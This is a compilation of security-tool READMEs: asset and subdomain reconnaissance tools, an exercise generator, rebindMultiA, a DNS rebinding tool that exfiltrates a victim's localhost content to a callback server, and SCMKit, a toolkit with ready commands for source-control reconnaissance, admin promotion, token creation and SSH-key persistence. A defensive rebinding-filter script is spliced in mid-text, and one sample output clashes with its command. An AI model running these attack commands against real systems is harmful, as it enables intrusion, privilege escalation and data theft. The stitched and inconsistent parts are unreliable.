During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him identify possible ways to get into an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse, security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.
It simplifies security assessments with a user-friendly interface and lets you effortlessly find a company's assets on the AWS cloud:
1- Download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Run docker compose :
docker-compose up -d
3- Run script.py script
docker-compose exec web python script.py
4 - Now go to http://:8000/search and enjoy the search engine
1- download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Setup virtual environment :
python3 -m venv myenv
source myenv/bin/activate
3- Install requirements.txt file :
pip install -r requirements.txt
4- run an instance of elasticsearch using docker :
docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1
5- update script.py and settings file to the host 'localhost':
#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
#se/settings.py
ELASTICSEARCH_DSL = {
'default': {
'hosts': 'localhost:9200'
},
}
6- Run script.py to index data in elasticsearch:
python script.py
7- Run the app:
python manage.py runserver 0:8000
Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository, clone the data and update the data.csv file (the full dataset contains close to 9 million records).
As an example, searching for .mil data gives:
Searching for tesla, as an example, gives:
CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.
Columbus Project is an API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features.
Columbus returned 638 subdomains of tesla.com in 0.231 sec.
By default Columbus returns only the subdomains in a JSON string array:
curl 'https://columbus.elmasy.com/lookup/github.com'
But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain header.
DOMAIN="github.com"
curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
while read SUB
do
if [[ "$SUB" == "" ]]
then
HOST="$DOMAIN"
else
HOST="${SUB}.${DOMAIN}"
fi
echo "$HOST"
done
For more, check the features or the API documentation.
Currently, entries are obtained from Certificate Transparency.
Usage of columbus-server:
-check
Check for updates.
-config string
Path to the config file.
-version
Print version informations.
-check: Check the latest version on GitHub. Prints up-to-date and returns 0 if no update required. Prints the latest tag (eg.: v0.9.1) and returns 1 if new release available. In case of error, prints the error message and returns 2.
git clone https://github.com/elmasy-com/columbus-server
make build
Create a new user:
adduser --system --no-create-home --disabled-login columbus-server
Create a new group:
addgroup --system columbus
Add the new user to the new group:
usermod -aG columbus columbus-server
Copy the binary to /usr/bin/columbus-server.
Make it executable:
chmod +x /usr/bin/columbus-server
Create a directory:
mkdir /etc/columbus
Copy the config file to /etc/columbus/server.conf.
Set the permission to 0600.
chmod -R 0600 /etc/columbus
Set the owner of the config file:
chown -R columbus-server:columbus /etc/columbus
Install the service file (eg.: /etc/systemd/system/columbus-server.service).
cp columbus-server.service /etc/systemd/system/
Reload systemd:
systemctl daemon-reload
Start columbus:
systemctl start columbus-server
If you want columbus to start automatically:
systemctl enable columbus-server
AiCEF is a tool implementing the accompanying framework [1] in order to harness the intelligence that is available from online resources, as well as threat groups' activities, arsenal (eg. MITRE), to create relevant and timely cybersecurity exercise content. This way, we abstract the events from the reports in a machine-readable form. The produced graphs can be infused with additional intelligence, e.g. the threat actor profile from MITRE, also mapped in our ontology. While this may fill gaps that would be missing from a report, one can also manipulate the graph to create custom and unique models. Finally, we exploit transformer-based language models like GPT to convert the graph into text that can serve as the scenario of a cybersecurity exercise. We have tested and validated AiCEF with a group of experts in cybersecurity exercises, and the results clearly show that AiCEF significantly augments the capabilities in creating timely and relevant cybersecurity exercises in terms of both quality and time.
We used Python to create a machine-learning-powered Exercise Generation Framework and developed a set of tools to perform a set of individual tasks which would help an exercise planner (EP) to create a timely and targeted Cybersecurity Exercise Scenario, regardless of her experience.
Problems an Exercise Planner faces:
Our Main Objective: Build an AI powered tool that can generate relevant and up-to-date Cyber Exercise Content in a few steps with little technical expertise from the user.
The updated project, AiCEF v.2.0, is planned to be publicly released by the end of 2023, pending heavy code review and functionality updates. Submodules with reduced functionality will start being released by early June 2023. Thank you for your patience.
The most convenient way to install AiCEF is by using the docker-compose command. For production deployment, we advise you deploy MySQL manually in a dedicated environment and then to start the other components using Docker.
First, make sure you have docker-compose installed in your environment:
$ sudo apt-get install docker-compose
Then, clone the repository:
$ git clone https://github.com/grazvan/AiCEF/docker.git /<choose-a-path>/AiCEF-docker
$ cd /<choose-a-path>/AiCEF-docker
Import the MySQL file in your
$ mysql -u <your_username> --password=<your_password> AiCEF_db < AiCEF_db.sql
Before running the docker-compose command, settings must be configured. Copy the sample settings file and change it according to your needs.
$ cp .env.sample .env
Note: Make sure you have an OpenAI API key available. Load the environment settings (including your MySQL connection details):
set -a ; source .env
Finally, run docker-compose in detached (-d) mode:
$ sudo docker-compose up -d
A common usage flow consists of generating a Trend Report to analyze patterns over time, parsing relevant articles and converting them into Incident Breadcrumbs using MLTP module and storing them in a knowledge database called KDb. Incidents are then generated using IncGen component and can be enhanced using the Graph Enhancer module to simulate known APT activity. The incidents come with injects that can be edited on the fly. The CSE scenario is then created using CEGen, which defines various attributes like CSE name, number of Events, and Incidents. MLCESO is a crucial step in the methodology where dedicated ML models are trained to extract information from the collected articles with over 80% accuracy. The Incident Generation & Enhancer (IncGen) workflow can be automated, generating a variety of incidents based on filtering parameters and the existing database. The knowledge database (KDB) consists of almost 3000 articles classified into six categories that can be augmented using APT Enhancer by using the activity of known APT groups from MITRE or manually.
Find below some sample usage screenshots:
AiCEF is a product designed and developed by Alex Zacharis, Razvan Gavrila and Constantinos Patsakis.
[1] https://link.springer.com/article/10.1007/s10207-023-00693-z
[2] https://oasis-open.github.io/cti-documentation/stix/intro.html
Contributions are welcome! If you'd like to contribute to AiCEF v2.0, please follow these steps:
git checkout -b feature/your-branch-name
git commit -m 'Add some feature'
git push origin feature/your-branch-name
AiCEF is licensed under Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license. See for more information.
Under the following terms:
Attribution - You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
NonCommercial - You may not use the material for commercial purposes.
No additional restrictions - You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.
rebindMultiA is a tool to perform a Multiple A Record rebind attack.
rebindmultia.com is a domain that I've set up to assist with these attacks. It makes every IP its own authoritative nameserver for the domain [IP].ns.rebindmultia.com. For example, 13.33.33.37.ns.rebindmultia.com's authoritative nameserver is 13.33.33.37.ip.rebindmultia.com, which resolves (as you might have guessed) to 13.33.33.37.
The MultiA Record Rebind attack is a variant of DNS Rebinding that weaponizes an attacker's ability to respond with two IP addresses in response to a DNS request and the browser's tendency to fall back to the second IP in the DNS response when the first one doesn't respond. In this attack, the attacker will configure a malicious DNS server and two malicious HTTP servers. The DNS server will respond with two A records:
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1
The victim browser will then connect to the first IP and begin interacting with the attacker's first malicious HTTP server. This server will respond with a page that contains two iframes, one to /steal and one to /rebind. The /steal iframe will load up a malicious page to reach into the second iframe and grab the content. The /rebind endpoint, when hit, will issue a 302 redirect to / and kill the first malicious HTTP server. As a result, when the browser reaches back out to the attacker's HTTP server, it will be met with a closed port. As such, it will fall back to the second IP. Once the target content has been loaded in the second iframe, the first iframe can reach into it, steal the data, and exfiltrate it to the attacker's second malicious HTTP server - the callback server.
This attack only works in a Windows environment. Linux and Mac will default to the private IP first and the attacker's server will never be queried.
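A defender's view of the two-record answer above, as an added example that is not part of rebindMultiA: a resolver-side check that flags and strips internal addresses returned for external names, plus the Host header check a local service can apply. The `corp.example` zone, the records other than the page's two, and all function names are constructed for illustration.

```python
import ipaddress
from collections import defaultdict
from typing import NamedTuple


class ARecord(NamedTuple):
    name: str
    ttl: int
    address: str


# Constructed sample: the page's two-record answer plus two ordinary answers.
REBIND_NAME = "127.0.0.1.target.13.33.33.37.ns.rebindmultia.com."
SAMPLE_RESPONSE = [
    ARecord(REBIND_NAME, 0, "13.33.33.37"),
    ARecord(REBIND_NAME, 0, "127.0.0.1"),
    ARecord("dns.google.", 300, "8.8.8.8"),
    ARecord("dns.google.", 300, "8.8.4.4"),
    ARecord("printer.corp.example.", 3600, "10.0.0.5"),
]
LOCAL_ZONES = ("corp.example",)  # assumption: zones allowed to hold internal IPs


def is_internal(address):
    """True for loopback, RFC 1918, link-local and unspecified addresses."""
    ip = ipaddress.ip_address(address)
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified


def under_zone(name, zones):
    """True if name equals or is a subdomain of one of the given zones."""
    name = name.rstrip(".").lower()
    return any(name == z or name.endswith("." + z) for z in zones)


def assess(records, local_zones=()):
    """Return {name: [finding, ...]} for the A records of one DNS response."""
    by_name = defaultdict(list)
    for rec in records:
        by_name[rec.name.rstrip(".").lower()].append(rec)
    findings = {}
    for name, recs in by_name.items():
        if under_zone(name, local_zones):
            continue  # internal answers are expected for our own zones
        internal = [r for r in recs if is_internal(r.address)]
        external = [r for r in recs if not is_internal(r.address)]
        notes = []
        if internal and external:
            # The multi-A shape: a public IP to serve the page, an internal
            # IP for the browser to fall back to once the public one dies.
            notes.append("mixed-internal-external")
        elif internal:
            notes.append("internal-only")
        if internal and any(r.ttl == 0 for r in recs):
            notes.append("zero-ttl")
        if notes:
            findings[name] = notes
    return findings


def filter_response(records, local_zones=()):
    """Drop internal addresses for names outside the local zones.

    With the internal record removed, the browser has no second address to
    fall back to when the external server stops answering.
    """
    return [r for r in records
            if under_zone(r.name, local_zones) or not is_internal(r.address)]


def host_header_allowed(host_header, allowed_hosts):
    """Service-side check: a rebound request still carries the external name
    in its Host header, so rejecting unknown hosts blocks the read."""
    host = host_header.strip().lower()
    if host.startswith("["):  # bracketed IPv6 literal, optional :port
        host = host[1:host.find("]")] if "]" in host else ""
    elif ":" in host:
        host = host.rsplit(":", 1)[0]
    return host.rstrip(".") in allowed_hosts


if __name__ == "__main__":
    for name, notes in assess(SAMPLE_RESPONSE, LOCAL_ZONES).items():
        print(name, notes)
    for rec in filter_response(SAMPLE_RESPONSE, LOCAL_ZONES):
        print("kept:", rec.name, rec.address)
```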
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com.
server.py) parses the requested dns name and returns two A records: 13.33.33.37 and 127.0.0.1.
server.py) and loads the /parent page which has two iframes.
/steal from the attacker's malicious HTTP server.
/rebind which results in a 302 redirect to / (the HTTP server will exit after this request).
/ per the 302 from the attacker's server.
/ from the attacker's (now dead) HTTP server, but fails to do so.
127.0.0.1. It then reaches out to that server and loads up the page in the iframe.
steal iframe reaches into the newly loaded second iframe and grabs the content.
steal iframe then sends the results back to the attacker's callback server.
pip3 install -r requirements.txt
python3 server.py --help
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: /
If you get this error:
┬─[justin@RhynoDroplet:~/p/rebindMultiA]─[14:26:24]─[G:master=]
╰─>$ python3 server.py
Traceback (most recent call last):
File "server.py", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'
Then you need to use a more up-to-date version of Python. Python 3.7+.
This must be executed from a publicly accessible IP.
git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMultiA
pip3 install -r requirements.txt
echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"
sudo python3 server.py
Source Code Management Attack Toolkit - SCMKit is a toolkit that can be used to attack SCM systems. SCMKit allows the user to specify the SCM system and attack module to use, along with specifying valid credentials (username/password or API key) to the respective SCM system. Currently, the SCM systems that SCMKit supports are GitHub Enterprise, GitLab Enterprise and Bitbucket Server. The attack modules supported include reconnaissance, privilege escalation and persistence. SCMKit was built in a modular approach, so that new modules and SCM systems can be added in the future by the information security community.
The below 3rd party libraries are used in this project.
Library | URL | License |
---|---|---|
Octokit | https://github.com/octokit/octokit.net | MIT License |
Fody | https://github.com/Fody/Fody | MIT License |
GitLabApiClient | https://github.com/nmklotas/GitLabApiClient | MIT License |
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License |
Take the below steps to setup Visual Studio in order to compile the project yourself. This requires a .NET library that can be installed from the NuGet package manager.
https://api.nuget.org/v3/index.json
Install-Package Costura.Fody -Version 3.3.3
Install-Package Octokit
Install-Package GitLabApiClient
Install-Package Newtonsoft.Json
The below table shows where each module is supported
Attack Scenario | Module | Requires Admin? | GitHub Enterprise | GitLab Enterprise | Bitbucket Server |
---|---|---|---|---|---|
Reconnaissance | listrepo | No | X | X | X |
Reconnaissance | searchrepo | No | X | X | X |
Reconnaissance | searchcode | No | X | X | X |
Reconnaissance | searchfile | No | X | X | X |
Reconnaissance | listsnippet | No | | X | |
Reconnaissance | listrunner | No | | X | |
Reconnaissance | listgist | No | X | | |
Reconnaissance | listorg | No | X | | |
Reconnaissance | privs | No | X | X | |
Reconnaissance | protection | No | X | | |
Persistence | listsshkey | No | X | X | X |
Persistence | removesshkey | No | X | X | X |
Persistence | createsshkey | No | X | X | X |
Persistence | listpat | No | | X | X |
Persistence | removepat | No | | X | X |
Persistence | createpat | Yes (GitLab Enterprise only) | | X | X |
Privilege Escalation | addadmin | Yes | X | X | X |
Privilege Escalation | removeadmin | Yes | X | X | X |
Reconnaissance | adminstats | Yes | X | | |
Discover repositories being used in a particular SCM system
Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.
This will list all repositories that a user can see.
SCMKit.exe -s github -m listrepo -c userName:password -u https://github.something.local
SCMKit.exe -s github -m listrepo -c apiKey -u https://github.something.local
This will list all repositories that a user can see.
SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local
This will list all repositories that a user can see.
SCMKit.exe -s bitbucket -m listrepo -c userName:password -u https://bitbucket.something.local
SCMKit.exe -s bitbucket -m listrepo -c apiKey -u https://bitbucket.something.local
C:\>SCMKit.exe -s gitlab -m listrepo -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listrepo
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 8:30:47 PM
==================================================
Name | Visibility | URL
----------------------------------------------------------------------------------------------------------
MaraudersMap | Private | https://gitlab.hogwarts.local/hpotter/maraudersmap
testingStuff | Internal | https://gitlab.hogwarts.local/adumbledore/testingstuff
Spellbook | Internal | https://gitlab.hogwarts.local/hpotter/spellbook
findShortestPathToGryffindorSword | Internal | https://gitlab.hogwarts.local/hpotter/findShortestPathToGryffindorSword
charms | Public | https://gitlab.hogwarts.local/hgranger/charms
Secret-Spells | Internal | https://gitlab.hogwarts.local/adumbledore/secret-spells
Monitoring | Internal | https://gitlab.hogwarts.local/gitlab-instance-10590c85/Monitoring
Search for repositories by repository name in a particular SCM system
Provide the searchrepo module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the matching repository name and URL.
The GitHub repo search is a "contains" search: it returns repos whose names contain the search term you enter.
SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term"
SCMKit.exe -s github -m searchrepo -c apikey -u https://github.something.local -o "some search term"
The GitLab repo search is a "contains" search: it returns repos whose names contain the search term you enter.
SCMKit.exe -s gitlab -m searchrepo -c userName:password -u https://gitlab.something.local -o "some search term"
SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term"
The Bitbucket repo search is a "starts with" search: it returns repos whose names start with the search term you enter.
SCMKit.exe -s bitbucket -m searchrepo -c userName:password -u https://bitbucket.something.local -o "some search term"
SCMKit.exe -s bitbucket -m searchrepo -c apikey -u https://bitbucket.something.local -o "some search term"
Search for code containing a given keyword in a particular SCM system
Provide the searchcode module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.
The GitHub code search is a "contains" search: it returns code that contains the search term you enter in any line.
SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term"
SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term"
The GitLab code search is a "contains" search: it returns code that contains the search term you enter in any line.
SCMKit.exe -s gitlab -m searchcode -c userName:password -u https://gitlab.something.local -o "some search term"
SCMKit.exe -s gitlab -m searchcode -c apikey -u https://gitlab.something.local -o "some search term"
The Bitbucket code search is a "contains" search: it returns code that contains the search term you enter in any line.
SCMKit.exe -s bitbucket -m searchcode -c userName:password -u https://bitbucket.something.local -o "some search term"
SCMKit.exe -s bitbucket -m searchcode -c apikey -u https://bitbucket.something.local -o "some search term"
Search for files in repositories containing a given keyword in the file name in a particular SCM system
Provide the searchfile module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.
The GitHub file search is a "contains" search: it returns files whose names contain the search term you enter.
SCMKit.exe -s github -m searchfile -c userName:password -u https://github.something.local -o "some search term"
SCMKit.exe -s github -m searchfile -c apikey -u https://github.something.local -o "some search term"
The GitLab file search is a "contains" search: it returns files whose names contain the search term you enter.
SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term"
SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term"
The Bitbucket file search is a "contains" search: it returns files whose names contain the search term you enter.
SCMKit.exe -s bitbucket -m searchfile -c userName:password -u https://bitbucket.something.local -o "some search term"
SCMKit.exe -s bitbucket -m searchfile -c apikey -u https://bitbucket.something.local -o "some search term"
C:\source\SCMKit\SCMKit\bin\Release>SCMKit.exe -s bitbucket -m searchfile -c apikey -u http://bitbucket.hogwarts.local:7990 -o jenkinsfile
==================================================
Module: searchfile
System: bitbucket
Auth Type: API Key
Options: jenkinsfile
Target URL: http://bitbucket.hogwarts.local:7990
Timestamp: 1/14/2022 10:17:59 PM
==================================================
[>] REPO: http://bitbucket.hogwarts.local:7990/scm/~HPOTTER/hpotter
[>] FILE: Jenkinsfile
[>] REPO: http://bitbucket.hogwarts.local:7990/scm/STUD/cred-decryption
[>] FILE: subDir/Jenkinsfile
Total matching results: 2
List snippets owned by the current user in GitLab
Provide the listsnippet module, along with any relevant authentication information and URL.
SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local
C:\>SCMKit.exe -s gitlab -m listsnippet -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listsnippet
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:17:36 PM
==================================================
Title | Raw URL
---------------------------------------------------------------------------------------------
spell-script | https://gitlab.hogwarts.local/-/snippets/2/raw
List all GitLab runners available to the current user in GitLab
Provide the listrunner module, along with any relevant authentication information and URL. If the user is an administrator, you will be able to list all runners within the GitLab Enterprise instance, which includes shared and group runners.
SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local
C:\>SCMKit.exe -s gitlab -m listrunner -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listrunner
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/25/2022 11:40:08 AM
==================================================
ID | Name | Repo Assigned
---------------------------------------------------------------------------------
2 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/spellbook.git
3 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/maraudersmap.git
List gists owned by the current user in GitHub
Provide the listgist module, along with any relevant authentication information and URL.
SCMKit.exe -s github -m listgist -c userName:password -u https://github.something.local
SCMKit.exe -s github -m listgist -c apikey -u https://github.something.local
C:\>SCMKit.exe -s github -m listgist -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: listgist
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:43:23 PM
==================================================
Description | Visibility | URL
----------------------------------------------------------------------------------------------------------
Shell Script to Decode Spell | public | https://github-enterprise.hogwarts.local/gist/c11c6bb3f47fe67183d5bc9f048412a1
List all organizations the current user belongs to in GitHub
Provide the listorg module, along with any relevant authentication information and URL.
SCMKit.exe -s github -m listorg -c userName:password -u https://github.something.local
SCMKit.exe -s github -m listorg -c apiKey -u https://github.something.local
C:\>SCMKit.exe -s github -m listorg -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: listorg
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:44:48 PM
==================================================
Name | URL
-----------------------------------------------------------------------------------
Hogwarts | https://github-enterprise.hogwarts.local/api/v3/orgs/Hogwarts/repos
Get the assigned privileges to an access token being used in a particular SCM system
Provide the privs module, along with an API key and URL.
SCMKit.exe -s github -m privs -c apiKey -u https://github.something.local
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
C:\>SCMKit.exe -s gitlab -m privs -c apikey -u https://gitlab.hogwarts.local
==================================================
Module: privs
System: gitlab
Auth Type: API Key
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:18:27 PM
==================================================
Token Name | Active? | Privilege | Description
---------------------------------------------------------------------------------------------------------------------------------
hgranger-api-token | True | api | Read-write for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_user | Read-only for endpoints under /users. Essentially, access to any of the GET requests in the Users API.
hgranger-api-token | True | read_api | Read-only for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_repository | Read-only (pull) for the repository through git clone.
hgranger-api-token | True | write_repository | Read-write (pull, push) for the repository through git clone. Required for accessing Git repositories over HTTP when 2FA is enabled.
Promote a normal user to an administrative role in a particular SCM system
Provide the addadmin module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to add an administrative role to.
SCMKit.exe -s github -m addadmin -c userName:password -u https://github.something.local -o targetUserName
SCMKit.exe -s github -m addadmin -c apikey -u https://github.something.local -o targetUserName
SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName
Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m addadmin -c userName:password -u https://bitbucket.something.local -o targetUserName
C:\>SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: addadmin
System: gitlab
Auth Type: API Key
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:19:32 PM
==================================================
[+] SUCCESS: The hgranger user was successfully added to the admin role.
Demote an administrative user to a normal user role in a particular SCM system
Provide the removeadmin module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to remove an administrative role from.
SCMKit.exe -s github -m removeadmin -c userName:password -u https://github.something.local -o targetUserName
SCMKit.exe -s github -m removeadmin -c apikey -u https://github.something.local -o targetUserName
SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m removeadmin -c apikey -u https://gitlab.something.local -o targetUserName
Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m removeadmin -c userName:password -u https://bitbucket.something.local -o targetUserName
C:\>SCMKit.exe -s gitlab -m removeadmin -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: removeadmin
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:20:12 PM
==================================================
[+] SUCCESS: The hgranger user was successfully removed from the admin role.
Create an access token to be used in a particular SCM system
Provide the createpat module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to create an access token for.
This can only be performed as an administrator. You will provide the username that you would like to create a PAT for.
SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName
Creates a PAT for the user you are currently authenticating as. In Bitbucket you cannot create a PAT for another user, even as an admin. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the PAT ID that is shown after being created. You will need this when you need to remove the PAT in the future.
SCMKit.exe -s bitbucket -m createpat -c userName:password -u https://bitbucket.something.local
C:\>SCMKit.exe -s gitlab -m createpat -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: createpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:51:23 PM
==================================================
ID | Name | Token
-----------------------------------------------------
59 | SCMKIT-AaCND | R3ySx_8HUn6UQ_6onETx
[+] SUCCESS: The hgranger user personal access token was successfully added.
List access tokens for a user on a particular SCM system
Provide the listpat module, along with any relevant authentication information and URL.
Only requires admin if you want to list another user's PATs. A regular user can list their own PATs.
SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser
SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser
List access tokens for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local
List access tokens for another user (requires admin). Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local -o targetUser
C:\>SCMKit.exe -s gitlab -m listpat -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: listpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:54:41 PM
==================================================
ID | Name | Active? | Scopes
----------------------------------------------------------------------------------------------
59 | SCMKIT-AaCND | True | api, read_repository, write_repository
Remove an access token for a user in a particular SCM system
Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID of the target user's PAT that you would like to remove.
Only requires admin if you want to remove another user's PAT. A regular user can remove their own PAT. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT and also when you listed the PAT.
SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID
SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.something.local -o patID
Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT.
SCMKit.exe -s bitbucket -m removepat -c userName:password -u https://bitbucket.something.local -o patID
C:\>SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.hogwarts.local -o 58
==================================================
Module: removepat
System: gitlab
Auth Type: API Key
Options: 59
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:56:47 PM
==================================================
[*] INFO: Revoking personal access token of ID: 59
[+] SUCCESS: The personal access token of ID 59 was successfully revoked.
Create an SSH key to be used in a particular SCM system
Provide the createsshkey module, along with any relevant authentication information and URL.
Creates an SSH key for the user you are authenticating as.
SCMKit.exe -s github -m createsshkey -c userName:password -u https://github.something.local -o "ssh public key"
SCMKit.exe -s github -m createsshkey -c apiToken -u https://github.something.local -o "ssh public key"
Creates an SSH key for the user you are authenticating as. Take note of the SSH key ID that is shown after the key is created. You will need this ID to remove the SSH key in the future.
SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"
SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key"
Creates an SSH key for the user you are authenticating as. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the SSH key ID that is shown after the key is created. You will need this ID to remove the SSH key in the future.
SCMKit.exe -s bitbucket -m createsshkey -c userName:password -u https://bitbucket.something.local -o "ssh public key"
List SSH keys for a user on a particular SCM system
Provide the listsshkey module, along with any relevant authentication information and URL.
List SSH keys for current user. This will include the SSH key IDs, which are needed when you want to remove an SSH key.
SCMKit.exe -s github -m listsshkey -c userName:password -u https://github.something.local
SCMKit.exe -s github -m listsshkey -c apiToken -u https://github.something.local
List SSH keys for current user.
SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://gitlab.something.local
List SSH keys for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m listsshkey -c userName:password -u https://bitbucket.something.local
C:\>SCMKit.exe -s gitlab -m listsshkey -u http://gitlab.hogwarts.local -c apiToken
==================================================
Module: listsshkey
System: gitlab
Auth Type: API Key
Options:
Target URL: https://gitlab.hogwarts.local
